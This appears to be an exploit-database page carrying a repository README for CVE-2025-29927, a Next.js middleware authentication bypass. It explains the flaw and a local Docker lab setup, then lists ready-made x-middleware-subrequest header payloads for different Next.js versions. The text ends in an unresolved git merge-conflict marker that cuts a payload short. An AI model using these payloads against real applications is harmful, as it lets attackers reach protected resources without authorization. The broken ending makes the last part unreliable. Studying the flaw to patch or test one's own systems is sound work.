Exploit for CVE-2025-29927

Name: Exploit for CVE-2025-29927
Rating: 5 (64 reviews)
2025-03-25 | CVSS 9.1
## https://sploitus.com/exploit?id=F39F21A4-600F-53DE-B873-F029A87A800C
# CVE-2025-29927


![Image](https://github.com/user-attachments/assets/b3073493-1abc-4770-a3b5-5be6ebbf6175)


## CVE-2025-29927 Vulnerability

All versions of Next.js from 11.1.4 through 13.5.6, 14.x before 14.2.25, and 15.x before 15.2.3 are affected by this vulnerability. The impact is particularly significant for applications that rely on middleware for implementing access controls, as attackers can gain unauthorized access to protected resources without authentication.

### The vulnerability mechanism

The vulnerability in CVE-2025-29927 stems from a design flaw in how Next.js processes the `x-middleware-subrequest` header. This header was originally intended for internal use within the Next.js framework to prevent infinite middleware execution loops.

When a Next.js application uses middleware, the `runMiddleware` function is called to process incoming requests. As part of its functionality, this function checks for the presence of the `x-middleware-subrequest` header. If this header exists and contains a specific value, the middleware execution is skipped entirely, and the request is forwarded directly to its original destination via `NextResponse.next()`.

The vulnerability lies in the fact that this header check can be exploited by external users. By adding the `x-middleware-subrequest` header with the correct value to a request, an attacker can completely bypass any middleware-based protection mechanisms.

## Project Setup Guide

1.  Clone the repository:

    ```bash
    git clone <repository_url>
    ```

2.  Navigate to the project directory:

    ```bash
    cd nextjs-docker-app
    ```

3.  Build the Docker image:

    ```bash
    docker build -t nextjs-app .
    ```

4.  Run the Docker container:

    ```bash
    docker run -p 3000:3000 nextjs-app
    ```

5.  Access the application in your browser at `http://localhost:3000`.


### Exploitation Across Different Next.js Versions

The exploitation method varies slightly depending on the Next.js version:

#### For versions prior to 12.2:

In these versions, middleware files had to be named `_middleware.ts` and placed inside the `pages` folder. The value of `middlewareInfo.name` was composed of the directory name and the file name:

```cli
x-middleware-subrequest: pages/_middleware
```

For nested routes, there could be multiple middleware files at different levels, resulting in multiple possible values for the header:

```cli
x-middleware-subrequest: pages/dashboard/_middleware
```

or

```cli
x-middleware-subrequest: pages/dashboard/panel/_middleware
```

#### For versions 12.2 and later:

Starting with version 12.2, Next.js changed the middleware conventions. The file should be named `middleware.ts` (without the underscore) and should no longer be located in the `pages` folder. For these versions, the payload is simpler:

```cli
x-middleware-subrequest: middleware
```

Additionally, Next.js allows for an alternative project structure with a `/src` directory. In such cases, the payload would be:

```cli
x-middleware-subrequest: src/middleware
```

#### For versions 13.2.0 and later:

For versions 13.2.0 and above, Next.js introduced a maximum recursion depth for middleware execution. This was implemented to prevent infinite loops but doesn't affect the vulnerability. The exploitation remains the same, as the header check occurs before any recursion depth checks.

```cli
x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware
```

Alternatively, for projects using a `/src` directory structure:

```cli
x-middleware-subrequest: src/middleware:src/middleware:src/middleware:sr
=======
# cve-2025-29927
>>>>>>> 56c7b2dcd548caf771750519107bf7c57749a864